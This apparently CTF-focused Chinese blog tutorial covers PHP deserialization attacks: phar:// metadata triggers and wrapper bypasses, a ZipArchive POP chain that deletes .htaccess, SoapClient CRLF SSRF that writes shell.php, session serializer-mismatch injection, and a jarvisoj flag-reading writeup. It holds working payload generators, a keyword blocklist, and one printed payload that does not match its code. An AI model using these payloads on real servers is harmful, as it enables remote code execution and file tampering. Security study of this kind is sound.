说在前面
对于PHP反序列化,原来也就只是浅尝而止。最近看到很多题的出现了多种没有了解过的反序列化形式,就此进一步学习一下。其中很多内容都参考了师傅们的博客,部分内容经过自己的修改。如果存在错误,还望师傅们指出。
pravite和Protected成员的序列化
以前在做反序列化的题的时候遇到的都是public成员,但在k0rz3n师傅的文章中看到了Private和Protected权限序列化的过程中有着不同的差别。这里做一个小知识点的总结。
先来复习一下一个简单的序列化例子:
<?php class Threezh1 { public $text; function execute($payload) { eval($payload); } function __destruct(){ $this->execute($this->text); } } $a = new Threezh1(); $a->text = 'echo "Threezh1";'; echo serialize($a); ?>
序列化后的内容:
O:8:"Threezh1":1:{s:4:"text";s:16:"echo "Threezh1";";}
O代表这是一个对象,8代表对象名称的长度,1代表成员个数。
大括号中分别是:属性名类型、长度、名称;值类型、长度、值。
那反序列化的过程中是这样的:
<?php class Threezh1 { public $text; function execute($payload) { eval($payload); } function __destruct(){ $this->execute($this->text); } } unserialize($_GET["a"]); ?>
返回:
Threezh1
Private类型
那么问题来了,如果把$text成员从public改为private呢?
因为在实例中无法通过$obj->属性名(或方法名) 来调用pravite类型的方法或属性。所以上面生成的例子需要改一下:
<?php class Threezh1 { private $text = 'phpinfo();'; public function setPayload($temp){ $this->text = $temp; } function execute($payload) { eval($payload); } function __destruct(){ $this->execute($this->text); } } $a = new Threezh1(); $a->setPayload('echo "Threezh1";'); $data = serialize($a); echo($data); file_put_contents("serialize.txt", $data);
这时候生成出来的序列化的内容为:
O:8:"Threezh1":1:{s:14:"Threezh1text";s:16:"echo "Threezh1";";}
按照前面的反序列化步骤,进行反序列化。会发现序列化并没有成功,显示了phpinfo的页面:
那怎么样才能使它反序列化成功呢?我们使用winhex打开刚刚保存的serialize.txt。内容如下图:
会发现在Threezh1的左右,也就是属性名中的类名左右存在两个空字节。所以反序列化不成功的原因就是由于序列化内容生成到网页后,空字节不会一同生成出去,导致反序列化的时候无法识别是private属性,反序列化失败。
那解决这个问题的方法就是,在传递反序列化字符串中,在类名的左右加上%00,也就是空字节对于的URL编码。反序列化成功结果如下:
这也正好解释了,为什么序列化内容中,为什么属性名的长度为14。
所以,Private类型在序列化的格式为:%00类名%00
Protected类型
Protected类型和private有些许不同,生成的序列化内容为:
O:8:"Threezh1":1:{s:7:"*text";s:16:"echo "Threezh1";";}
使用winhex查看保存的serialize.txt:
可得出,Protected类型在序列化的格式为:%00*%00类名
Phar反序列化
phar的总结类文章已经有很多了,比如Hu3sky学长的初探phar://
自己在总结phar的过程中又学习到了一些新的内容,这里就做下记录。
phar文件的结构:
phar文件都包含以下几个部分:
1. stub
phar文件的标志,必须以 xxx __HALT_COMPILER();?> 结尾,否则无法识别。xxx可以为自定义内容。
2. manifest
phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是漏洞利用最核心的地方。
3. content
被压缩文件的内容
4. signature (可空)
签名,放在末尾。生成一个phar文件:
php内置了一个phar类来处理相关操作。
注意:这里要将php.ini里面的phar.readonly选项设置为Off。并把分号去掉。
(如果你在命令行运行PHP文件还是无法生成成功,请使用php -v查看php版本并在修改指定版本的php.ini。)
<?php class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new TestObject(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
漏洞利用条件
- phar文件要能够上传到服务器端。
- 要有可用的魔术方法作为“跳板”。
- 文件操作函数的参数可控,且
:、/、phar等特殊字符没有被过滤。
phar受影响的文件操作函数:
知道创宇测试后受影响的函数列表:
但实际并不止这一些。
参考zxc师傅的文章:https://blog.zsxsoft.com/post/38
在跟踪了受影响函数的调用情况后发现,除了所有文件函数,只要是函数的实现过程直接或间接调用了php_stream_open_wrapper。都可能触发phar反序列化漏洞。
以下这些方式都可触发phar反序列化漏洞:
exif
exif_thumbnail
exif_imagetypegd
imageloadfont
imagecreatefrom***hash
hash_hmac_file
hash_file
hash_update_file
md5_file
sha1_filefile / url
get_meta_tags
get_headersstandard
getimagesize
getimagesizefromstringzip
$zip = new ZipArchive();
$res = $zip->open('c.zip');
$zip->extractTo('phar://test.phar/test');Bzip / Gzip
当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2://和compress.zlib://绕过
$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';配合其他协议:(SUCTF)
当环境限制了phar不能出现在前面的字符里,还可以配合其他协议进行利用。
php://filter/read=convert.base64-encode/resource=phar://phar.phar
这次的ByteCTF也有这个点。使用的是:php://filter/resource=phar://phar.pharPostgres
<?php $pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456")); @$pdo->pgsqlCopyFromFile('aa', 'phar://phar.phar/aa'); ?>
pgsqlCopyToFile和pg_trace同样也是能使用的,需要开启phar的写功能。Mysql
LOAD DATA LOCAL INFILE也会触发这个php_stream_open_wrapper
配置一下mysqld:
[mysqld]
local-infile=1
secure_file_priv=""<?php class A { public $s = ''; public function __wakeup () { system($this->s); } } $m = mysqli_init(); mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true); $s = mysqli_real_connect($m, 'localhost', 'root', 'root', 'testtable', 3306); $p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;'); ?>
漏洞的利用实例:
一个简单的例子
phar.php
<?php class TestObject { } $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new TestObject(); $o -> name='Threezh1'; //控制TestObject中的name变量为Threezh1 $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
index.php
<?php class TestObject { public $name; function __destruct() { echo $this -> name; } } if ($_GET["file"]){ file_exists($_GET["file"]); } ?>
使用php phar.php生成phar.phar文件。
访问:http://127.0.0.1/index.php?file=phar://phar.phar
返回:Threezh1。 反序列化利用成功。
绕过文件格式限制
- 上传html页面: upload.html
- 后端校验页面:upload.php
- 一个漏洞页面:index.php (存在file_exits(), eval()函数)
- 一个上传目录: upload_file/
upload.html:
<!DOCTYPE html>
<html>
<head>
<title>upload file</title>
</head>
<body>
<form action="http://127.0.0.1/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="Upload" />
</form>
</body>
</html>upload.php
仅允许格式为gif的文件上传。上传成功的文件会存储到upload_file目录下。
<?php if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') { echo "Upload: " . $_FILES["file"]["name"]; echo "Type: " . $_FILES["file"]["type"]; echo "Temp file: " . $_FILES["file"]["tmp_name"]; if (file_exists("upload_file/" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { move_uploaded_file($_FILES["file"]["tmp_name"], "upload_file/" .$_FILES["file"]["name"]); echo "Stored in: " . "upload_file/" . $_FILES["file"]["name"]; } } else { echo "Invalid file,you can only upload gif"; }
index.php
<?php class TestObject{ var $data = 'echo "Hello World";'; function __destruct() { eval($this -> data); } } if ($_GET["file"]){ file_exists($_GET["file"]); }
绕过思路:GIF格式验证可以通过在文件头部添加GIF89a绕过
我们可以构造一个php来生成phar.phar。
<?php class TestObject { } $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub $o = new TestObject(); $o -> data='phpinfo();'; //控制TestObject中的data为phpinfo()。 $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
利用过程:
- 一、生成一个phar.phar,修改后缀名为phar.gif
- 二、上传到upload_file目录下
可见已经执行了phpinfo命令了。
通过修改后缀名和文件头,能够绕过大部分的校验。
配合PHP内核哈希表碰撞攻击
参考:https://xz.aliyun.com/t/2613
原生类序列化(ZipArchive::open)
拿这次2019 ByteCTF的ezCMS这道题来学习这个知识点。
先是哈希长度扩展攻击 参考
登录账户:admin
登录密码:admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00test
置cookie:user=2e05fd4ee5d0ec7853d174d06cd3ca47;config.php:
<?php session_start(); error_reporting(0); $sandbox_dir = 'sandbox/'. md5($_SERVER['REMOTE_ADDR']); // sandbox + md5(ip) global $sandbox_dir; function login(){ $secret = "********"; setcookie("hash", md5($secret."adminadmin")); return 1; # 52107b08c0f3342d2153ae1d68e6262c } function is_admin(){ $secret = "********"; $username = $_SESSION['username']; $password = $_SESSION['password']; if ($username == "admin" && $password != "admin"){ if ($_COOKIE['user'] === md5($secret.$username.$password)){ return 1; } } return 0; } class Check{ // 检查一些关键字 public $filename; function __construct($filename) { $this->filename = $filename; } function check(){ $content = file_get_contents($this->filename); $black_list = ['system','eval','exec','+','passthru','`','assert']; // 检查了文件中的一些关键字 foreach ($black_list as $k=>$v){ if (stripos($content, $v) !== false){ die("your file make me scare"); } } return 1; } } class File{ public $filename; public $filepath; public $checker; function __construct($filename, $filepath) { $this->filepath = $filepath; $this->filename = $filename; } public function view_detail(){ if (preg_match('/^(phar|compress|compose.zlib|zip|rar|file|ftp|zlib|data|glob|ssh|expect)/i', $this->filepath)){ die("nonono~"); } $mine = mime_content_type($this->filepath); //这里可以触发phar反序列化 $store_path = $this->open($this->filename, $this->filepath); $res['mine'] = $mine; $res['store_path'] = $store_path; return $res; } public function open($filename, $filepath){ $res = "$filename is in $filepath"; return $res; } function __destruct() //类被销毁时自动触发 { if (isset($this->checker)){ $this->checker->upload_file(); //调用upload_file()方法 } } } class Admin{ public $size; public $checker; public $file_tmp; public $filename; public $upload_dir; public $content_check; function __construct($filename, $file_tmp, $size) { $this->upload_dir = 'sandbox/'.md5($_SERVER['REMOTE_ADDR']); if (!file_exists($this->upload_dir)){ mkdir($this->upload_dir, 0777, true); } if (!is_file($this->upload_dir.'/.htaccess')){ file_put_contents($this->upload_dir.'/.htaccess', 'lolololol, i control all'); } $this->size = $size; $this->filename = $filename; $this->file_tmp = $file_tmp; $this->content_check = new Check($this->file_tmp); $profile = new Profile(); $this->checker = $profile->is_admin(); } public function upload_file(){ if (!$this->checker){ die('u r not admin'); } $this->content_check -> check(); $tmp = explode(".", $this->filename); $ext = end($tmp); // if ($this->size > 204800){ die("your file is too big"); } # move_uploaded_file($this->file_tmp, $this->upload_dir.'/'.md5($this->filename).'.'.$ext); } public function __call($name, $arguments) { } } class Profile{ public $username; public $password; public $admin; public function is_admin(){ //从SESSION当中取用户名和密码 $this->username = $_SESSION['username']; $this->password = $_SESSION['password']; $secret = "********"; if ($this->username === "admin" && $this->password != "admin"){ if ($_COOKIE['user'] === md5($secret.$this->username.$this->password)){ return 1; } } return 0; } function __call($name, $arguments) //当调用不存在的方式时触发 { $this->admin->open($this->username, $this->password); //这里作为 } }
view.php:
<?php error_reporting(0); include ("config.php"); $file_name = $_GET['filename']; $file_path = $_GET['filepath']; $file_name=urldecode($file_name); $file_path=urldecode($file_path); $file = new File($file_name, $file_path); //调用File类 $res = $file->view_detail(); //调用view_detail方法 $mine = $res['mine']; $store_path = $res['store_path']; echo <<<EOT <div style="height: 30px; width: 1000px;"> <Ariel>mine: {$mine}</Ariel><br> </div> <div style="height: 30px; "> <Ariel>file_path: {$store_path}</Ariel><br> </div> EOT; ?>
在view.php中,url中传递的filename与filepath进行一次url编码之后传递到File类中调用view_detail方法。
view_detail方法中存在一个mime_content_type()函数, 这个函数是可以导致phar反序列化的。
在此之前:
if (preg_match('/^(phar|compress|compose.zlib|zip|rar|file|ftp|zlib|data|glob|ssh|expect)/i', $this->filepath)){ die("nonono~"); }
这个正则禁止了大部分的进行phar反序列化的关键词,不允许这些关键词出现在filepath的开头。但是这里漏了一个php://协议。 参考SUCTF
找到了phar反序列化触发点之后,开始构造一条可利用的POP链,思路:
- File类的
__destruct()会调用$this->checker->upload_file()。可以将$this->checker赋值为Profile类 - 因为
$this->checker没有Profile类,触发__call()魔术方法 - 调用
$this->admin->open($this->username, $this->password);这里可以使用原生类反序列化
原生类反序列化参考
简要笔记:
利用PHP函数 ZipArchive::open($filename, $flags)
当$flag=ZipArchive::OVERWRITE时,就会将$filename的文件删除构造Payload:
<?php class File{ public $filename; public $filepath; public $checker; function __construct($filename, $filepath) { $this->filepath = $filepath; $this->filename = $filename; $this->checker = new Profile(); } } class Profile{ public $username; public $password; public $admin; function __construct() { $this->username = "./sandbox/f528764d624db129b32c21fbca0cb8d6/.htaccess"; $this->password = "ZipArchive::OVERWRITE"; $this->admin = new ZipArchive(); } } $a = new File("threezh1", "threezh1"); class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new TestObject(); $phar->setMetadata($a); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
先把phar文件生成出来上传。
即可把.htaccess删除,再直接去访问一句话木马连蚁剑拿flag。(这里由于题目已经关了,自己的环境总是出问题,就没复现成功。)
原生类魔法函数(soapClient类)
参考这一篇:反序列化攻击面拓展提高篇
SOAP是webService三要素(SOAP、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration))之一
WSDL 用来描述如何访问具体的接口
UDDI用来管理,分发,查询webService
SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口。
webService相当于 HTTP + XMLSoapClient()方法
public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )
第一个参数是用来指明是否是wsdl模式,如果为null,那就是非wsdl模式,反序列化的时候会对第二个参数指明的url进行soap请求。
用Soap进行SSRF也有两个需要注意的点:
- Soap不是默认开启的,需要手动开启
- 需要触发__call方法才能进行SSRF
SOAP => CRLF => SSRF
文章当中的exp.php:
<?php $target = 'http://127.0.0.1/test.php'; $post_string = '1=file_put_contents("shell.php", "<?php phpinfo();?>");'; $headers = array( 'X-Forwarded-For: 127.0.0.1', 'Cookie: xxxx=1234' ); $b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri' => "aaab")); $aaa = serialize($b); $aaa = str_replace('^^','%0d%0a',$aaa); $aaa = str_replace('&','%26',$aaa); echo $aaa; $c=unserialize(urldecode($aaa)); $c->ss(); ?>
test.php:
<?php if($_SERVER['REMOTE_ADDR']=='127.0.0.1'){ echo 'hi'; @$a=$_POST[1]; @eval($a); } ?>
访问 http://127.0.0.1/exp.php 可在目录下写入一个shell.php。
Session反序列化
参考这一篇PHP中SESSION反序列化机制
PHP中的session保存
PHP.ini有以下配置项用于控制session有关的设置:
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下
session.save_handler=files 表明session是以文件的方式来进行存储的
session.auto_start=0 表明默认不启动session
session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎PHP中有多种session的序列话引擎,当我设置session为$_SESSION["name"] = "Threezh1";时。不同的引擎保存的session文件内容如下:
php:
name|s:8:"Threezh1";
存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php_binary:
names:8:"Threezh1";
存储方式是,键名+竖线+经过serialize()函数序列处理的值
php_serialize(php>5.5.4):
a:1:{s:4:"name";s:8:"Threezh1";}
存储方式是,经过serialize()函数序列化处理的值切换不同引擎使用的函数为:ini_set('session.serialize_handler', '需要设置的引擎');
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
// do somethingSession反序列化漏洞的原理:
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。如果session值可控,则可通过构造特殊的session值导致反序列化漏洞。
文章中有一个简单的例子:
test1.php
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["spoock"]=$_GET["a"]; ?>
test2.php
<?php ini_set('session.serialize_handler', 'php'); session_start(); class lemon { var $hi; function __construct(){ $this->hi = 'phpinfo();'; } function __destruct() { eval($this->hi); } } ?>
通过源码可以得知,test1中使用的session解析引擎是php_serialize,test2使用的是php。
并且在test1中,SESSION["spoock"]的值是可控的。
访问:
http://localhost/test1.php?a=|O:5:%22lemon%22:1:{s:2:%22hi%22;s:16:%22echo%20%27Threezh1%27;%22;}
a参数的值为“|” + 一个序列化的对象。
再访问:
http://localhost/test2.php
返回:
Threezh1
可知我们在session中的解析过程中,对我们的payload进行了反序列化。为什么会出现这种情况呢?
payload的构造
先看两个解析引擎存储session的格式:
php:
name|s:8:"Threezh1";
存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php_serialize(php>5.5.4):
a:1:{s:4:"name";s:8:"Threezh1";}
存储方式是,经过serialize()函数序列化处理的值思路:
因为储存session的页面(test1)使用的是php_serialize解析引擎,如果我们把session的值中添加一个“|”,在test2页面中使用php解析引擎解析的过程中,就会把“|”前面的值作为一个session键名,对“|”后面就会进行一个反序列化操作。
“|”后面的序列化对象生成:
<?php class lemon { var $hi; function __construct(){ $this->hi = 'phpinfo();'; } function __destruct() { eval($this->hi); } } $a = new lemon(); $a->hi = "echo 'Threezh1';"; echo serialize($a) ?>
但是直接这样利用的话,局限性还是太大了。
但在有趣的php反序列化总结中介绍了另一种Session反序列化漏洞的利用方式。
当PHP中session.upload_progress.enabled打开时,php会记录上传文件的进度,在上传时会将其信息保存在$_SESSION中。详情。
条件:
- session.upload_progress.enabled = On (是否启用上传进度报告)
- session.upload_progress.cleanup = Off (是否上传完成之后删除session文件)
上传文件进度的报告就会以写入到session文件中,所以我们可以设置一个与session.upload_progress.name同名的变量(默认名为PHP_SESSION_UPLOAD_PROGRESS),PHP检测到这种同名请求会在$_SESSION中添加一条数据。我们就可以控制这个数据内容为我们的恶意payload。
本打算复现:有趣的php反序列化总结,但在传递payload的时候,payload如果存在"|"。session就会为空,还没有找到解决的方法,如果有师傅遇到同样的问题,还望师傅帮忙解答。
jarvisoj-web-writeup PHPINFO
题目地址:http://web.jarvisoj.com:32784/
<?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); } } if(isset($_GET['phpinfo'])) { $m = new OowoO(); } else { highlight_string(file_get_contents('index.php')); } ?>
开头将session的解析引擎定义为了php。
访问:http://web.jarvisoj.com:32784/index.php?phpinfo 可看到session.upload_progress.enabled,session.upload_progress.cleanup都符合条件。
于是构造一个upload.html
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /> </form>
poc.php:
<?php class OowoO { public $mdzz; } $a = new OowoO(); $a->mdzz = "print_r(scandir(__dir__));"; echo serialize($a); ?>
生成序列化的值为:
O:5:"OowoO":1:{s:4:"mdzz";s:22:"print_r(system('ls'));";}
在上传的时候抓包,修改上传的内容为序列化的值前加一个“|”。即可遍历目录。
再从phpinfo中的SCRIPT_FILENAME字段得到根目录地址:/opt/lampp/htdocs/,构造得到payload:
O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents('/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php'));";}
得到flag:
参考
如有侵权请联系:admin#unsafe.sh